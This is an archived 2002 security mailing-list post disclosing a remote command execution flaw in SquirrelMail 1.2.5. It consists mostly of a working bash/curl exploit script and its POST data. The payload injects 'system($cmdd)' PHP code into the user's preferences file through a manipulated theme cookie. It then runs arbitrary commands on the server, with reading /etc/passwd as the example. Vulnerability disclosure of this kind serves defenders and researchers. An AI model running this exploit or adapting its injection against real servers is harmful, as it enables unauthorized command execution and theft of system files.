squirrelmail 1.2.5 email user can execute command

From: pokleyzz sakamaniaka (pokleyzzat_private)
Date: Wed Mar 27 2002 - 17:16:23 PST

Next message: Andrey Gordienko: "Oracle9i TSN DoS Attack"

Previous message: Alan McCaig: "JS embedding @ yahoo.com"
Next in thread: Konstantin Riabitsev: "Re: squirrelmail 1.2.5 email user can execute command"
Reply: Konstantin Riabitsev: "Re: squirrelmail 1.2.5 email user can execute command"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) email user can append $THEME variable through cookies ---------------- start sq125x --------------------- #!/bin/bash # # squirrelmail-1.2.5 remote execution by pokleyzz http://www.inetd-secure.net # # usage : ./sq125x themecount username password url command # example : ./sq125x 2 pokley 123456 http://mail.pokleyzz.my/mail "cat /etc/passwd" # # curl can be found at http://curl.haxx.se/libcurl/ # export PATH="/usr/bin:/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/l ocal/sbin" export CURL="/usr/bin/curl" export USERNAME="$2" export PASSWORD="$3" export THEME_COUNT="$1" export URL="$4" export COMMAND=`echo $5|sed 's/\ /%20/g' -` export TMPFILE="header.tmp" export THEME="theme[${THEME_COUNT}][PATH] =../data/${USERNAME}.pref; theme [${THEME_COUNT}][NAME]=testing" #step 1 sed "s/pokley/"$USERNAME"/g" post.txt >lame.txt /bin/rm -rf ${TMPFILE} $CURL -b "$THEME" -d login_username=${USERNAME} -d secretkey=${PASSWORD} -d js_autodetect_results=0 -d just_logged_in=1 -D ${TMPFILE} ${URL}/src/redirect.php export COOKIES=`cat ${TMPFILE} |grep Set- Cookie|awk {'print $2'}|while read data;do printf '%b' $data;done` export COOKIES="${COOKIES} ${THEME}" $CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp -- silent ${URL}/src/options.php #step 2 sleep 5s $CURL -b "$THEME" -d login_username=${USERNAME} -d secretkey=${PASSWORD} -d js_autodetect_results=0 -d just_logged_in=1 -D ${TMPFILE} ${URL}/src/redirect.php export COOKIES=`cat ${TMPFILE} |grep Set- Cookie|awk {'print $2'}|while read data;do printf '%b' $data;done` export COOKIES="${COOKIES} ${THEME}" $CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp -- silent ${URL}/src/options.php $CURL -b "$COOKIES" ${URL}/src/left_main.php? cmdd=${COMMAND} $CURL -b "$COOKIES" -o /tmp/.tmp --silent ${URL}/src/signout.php rm -rf lame.txt /tmp/.tmp -------------- end sq125 ---------------------- -------------- start post.txt -------------------- optpage=display&optmode=submit&new_chosen_the me=..%2Fdata% 2Fpokley.pref&new_custom_css=none&new_languag e=&new_javascript_setting=2&new_js_autodetect_re sults=1&new_show_num=15%0D%0A%3C%3F+% 0D%0Asystem%28%24cmdd%29%3B+%0D%0A% 3F% 3E&new_alt_index_colors=1&new_page_selector=1& new_page_selector_max=10&new_wrap_at=86&new _editor_size=76&new_location_of_buttons=between& new_use_javascript_addr_book=0&new_show_html_ default=0&new_include_self_reply_all=1&new_show_ xmailer_default=0&new_attachment_common_show_ images=0&new_pf_subtle_link=1&new_pf_cleandispl ay=0&new_mdn_user_support=1&new_compose_ne w_win=0&delete_move_next_bi=on&delete_move_ne xt_formATbottomi=on&submit_display=Submit ----------------------end post.txt --------------------------

Next message: Andrey Gordienko: "Oracle9i TSN DoS Attack"
Previous message: Alan McCaig: "JS embedding @ yahoo.com"
Next in thread: Konstantin Riabitsev: "Re: squirrelmail 1.2.5 email user can execute command"
Reply: Konstantin Riabitsev: "Re: squirrelmail 1.2.5 email user can execute command"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Mar 28 2002 - 14:38:20 PST